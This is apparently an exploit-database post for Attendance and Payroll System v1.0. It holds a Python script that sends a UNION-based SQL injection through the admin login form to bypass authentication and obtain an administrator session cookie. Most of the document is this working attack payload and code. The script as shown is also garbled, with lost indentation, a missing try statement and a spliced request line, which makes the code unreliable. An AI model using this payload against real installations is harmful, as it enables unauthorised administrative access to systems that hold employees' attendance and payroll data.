Authored by pr0z

Attendance and Payroll System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

# Exploit Title: Attendance and Payroll System v1.0 - SQLi Authentication Bypass
# Date: 04/03/2022
# Exploit Author: pr0z
# Vendor Homepage:
# Software Link:
# Version: v1.0
# Tested on: Linux, MySQL, Apache

import requests
import sys
from requests.exceptions import ConnectionError

print('n >> Attendance and Payroll System v1.0')
print(' >> Authentication Bypass through SQL injection')
print(' >> By pr0zn')

login_path = '/apsystem/admin/login.php'
index_path = '/apsystem/admin/index.php'

payload = "username=nobodyhavethisusername' UNION SELECT 1 as id, 'myuser' as username, '$2y$10$UNm8zqwv6d07rp3zr6iGD.GXNqo/P4qB7fUZB79M3vmpQ6SidGi.G' as password ,'zzz' as firstname,'zzz' as lastname,'zzz.php' as photo, '2018-04-30' as created_on -- &password=test&login="
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
#proxies = {'http': '', 'https': ''}

# Check for arguments
if len(sys.argv) < 2 or '-h' in sys.argv:
print("[!] Usage: python3")

# Bypass Authentication
target = sys.argv[1]
print("[+] Extracting Administrator cookie using SQLi ...")
sess = requests.Session()
sess.get(target + index_path,headers=headers, verify=False) + login_path, data=payload, headers=headers,verify=False)
except ConnectionError:
print('[-] We were unable to establish a connection')

cookie_val = sess.cookies.get_dict().get("PHPSESSID")

print("[+] Use the following cookie:n")
print(f"PHPSESSID: {cookie_val}")